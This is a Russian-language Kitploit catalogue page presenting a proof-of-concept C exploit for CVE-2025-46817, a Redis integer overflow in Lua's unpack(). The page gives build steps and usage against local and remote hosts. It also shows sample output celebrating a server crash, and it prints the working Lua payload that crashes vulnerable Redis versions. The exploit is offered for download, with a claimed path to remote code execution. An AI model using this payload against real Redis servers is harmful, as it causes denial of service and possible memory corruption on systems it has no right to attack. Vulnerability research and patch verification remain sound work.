Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-46817-PoC — C-эксплойт для CVE-2025-46817, уязвимости целочисленного переполнения в Redis, позволяющей обнаруживать сбои и потенциально выполнять произвольный код (RCE) через полезную нагрузку Lua unpack(). | Kitploit
Инструменты/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
Анализ уязвимостейЭксплуатацияФаззингТестирование на ПроникновениеБезопасность Баз Данных
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

C-эксплойт для CVE-2025-46817, уязвимости целочисленного переполнения в Redis, позволяющей обнаруживать сбои и потенциально выполнять произвольный код (RCE) через полезную нагрузку Lua unpack().

Репозиторий
2810 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-46817 Эксплойт целочисленного переполнения Redis

Banner Language Platform

Лёгкая реализация эксплойта CVE-2025-46817 для уязвимости целочисленного переполнения в Redis на языке C.

🚀 Возможности

  • Лёгкий: Один файл на C, без внешних зависимостей, кроме hiredis
  • Быстрый: Нативная компиляция для максимальной производительности
  • Цветной вывод: Красивые цвета терминала и иконки
  • Обнаружение сбоев: Автоматически определяет сбои сервера
  • Проверка версий: Определяет уязвимые версии Redis
  • Поддержка тайм-аутов: Настраиваемые тайм-ауты подключения

📋 Требования

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 Компиляция

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 Использование

Базовое использование

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

Удалённая цель

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

Параметры командной строки

root@kitploit:~
-H <host>    Хост сервера Redis (обязательно)
-P <port>    Порт сервера Redis (обязательно)  
-t <timeout> Тайм-аут подключения в секундах (по умолчанию: 10)
-h           Показать справочное сообщение

📊 Пример вывода

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    Инструмент эксплойта CVE-2025-46817
                   Целочисленное переполнение -> Цепочка RCE
                   Доступ -> https://pwnbuffer.org/

    Автор: Slayerkkk
    Цель: Redis <= 8.2.1
    Тип: Повреждение памяти -> Выполнение кода

ℹ️ Проверка подключения к 127.0.0.1:6379...
✅ Подключение успешно
ℹ️ Версия Redis: 8.2.1
❌ УЯЗВИМ - Версия <= 8.2.1
ℹ️ Проверка Lua-скриптов...
✅ Lua включён (1+1=2)

🚀 НАЧАЛО ЭКСПЛУАТАЦИИ
==================================================
💀 Выполнение полезной нагрузки эксплойта...
    Полезная нагрузка: Целочисленное переполнение через unpack()
💥 СЕРВЕР УПАЛ - Соединение потеряно!

📊 РЕЗУЛЬТАТ ЭКСПЛУАТАЦИИ
==============================
  💥 Статус: crashed (2.34s)

💀 ЭКСПЛУАТАЦИЯ УСПЕШНА - Сервер упал!
   Уязвимость CVE-2025-46817 подтверждена

🛡️ Затронутые версии

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 Технические детали

Уязвимость

Эксплойт нацелен на целочисленное переполнение в реализации функции unpack() Lua в Redis (luaB_unpack). При вызове с определёнными параметрами арифметика со знаковыми целыми числами переполняется, что заставляет Redis пытаться материализовать огромное количество возвращаемых значений.

Полезная нагрузка эксплойта

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

Воздействие

  • Сбой сервера: Немедленный отказ в обслуживании
  • Повреждение памяти: Повреждение кучи/стека
  • Потенциальный RCE: Повреждение памяти может привести к выполнению кода

🎯 Результаты обнаружения

Инструмент сообщает об одном из следующих статусов:

  • ✅ survived: Сервер обработал полезную нагрузку (вероятно, исправлен)
  • 💥 crashed: Сервер упал (уязвим)
  • ⚠️ timeout: Сервер завис (вероятно, уязвим)
  • ❌ error: Произошла другая ошибка

🙏 Благодарности

Автор: Slayerkkk
Веб-сайт: https://pwnbuffer.org

Скачать инструмент